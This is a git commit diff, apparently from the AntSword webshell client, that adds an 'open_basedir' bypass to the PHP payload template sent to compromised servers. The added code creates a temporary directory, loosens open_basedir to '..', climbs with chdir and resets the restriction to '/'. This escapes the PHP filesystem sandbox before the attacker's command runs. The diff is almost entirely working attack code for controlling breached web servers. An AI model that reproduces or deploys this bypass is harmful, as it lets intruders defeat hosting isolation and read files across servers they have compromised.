(Enhance:Core/PHP): 新增Bypass open_basedir

e7533a26 · Medicean · c774bc53 · e7533a26 · e7533a26
Commit e7533a26 authored Jun 16, 2021 by Medicean
Hide whitespace changes
Inline Side-by-side

Showing with 4 additions and 2 deletions

index.js source/core/php/index.js +3 -1

index.js source/core/php4/index.js +1 -1

No files found.
--- a/source/core/php/index.js
+++ b/source/core/php/index.js
@@ -86,8 +86,10 @@ class PHP extends Base {
      asencCode = this.__decoder__['default'].asoutput(ext);
    }
    // 组合完整的代码
+    // @chdir('.');@ini_set('open_basedir','..');for($i=0;$i<10;$i++){@chdir('..');}@ini_set('open_basedir','/');
    let tmpCode = data['_'];
-    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;
+    let opdir = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5));
+    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$oparr=preg_split("/\\\\\\\\|\\//", $opdir);$tmdir=".${opdir}";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir","..");for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}@ini_set("open_basedir","/");@rmdir($tmdir);};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;

    // 使用编码器进行处理并返回
    return this.encodeComplete(tag_s, tag_e, data);

--- a/source/core/php4/index.js
+++ b/source/core/php4/index.js
@@ -35,7 +35,7 @@ class PHP4 extends PHP {
    }
    // 组合完整的代码
    let tmpCode = data['_'];
-    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();${tmpCode};asoutput();die();`;
+    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir){$oparr=@preg_split("/\\\\\\\\|\\//", $opdir);$tmdir=".${opdir}";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir","..");for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}@ini_set("open_basedir","/");@rmdir($tmdir);};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();${tmpCode};asoutput();die();`;

    // 使用编码器进行处理并返回
    return this.encodeComplete(tag_s, tag_e, data);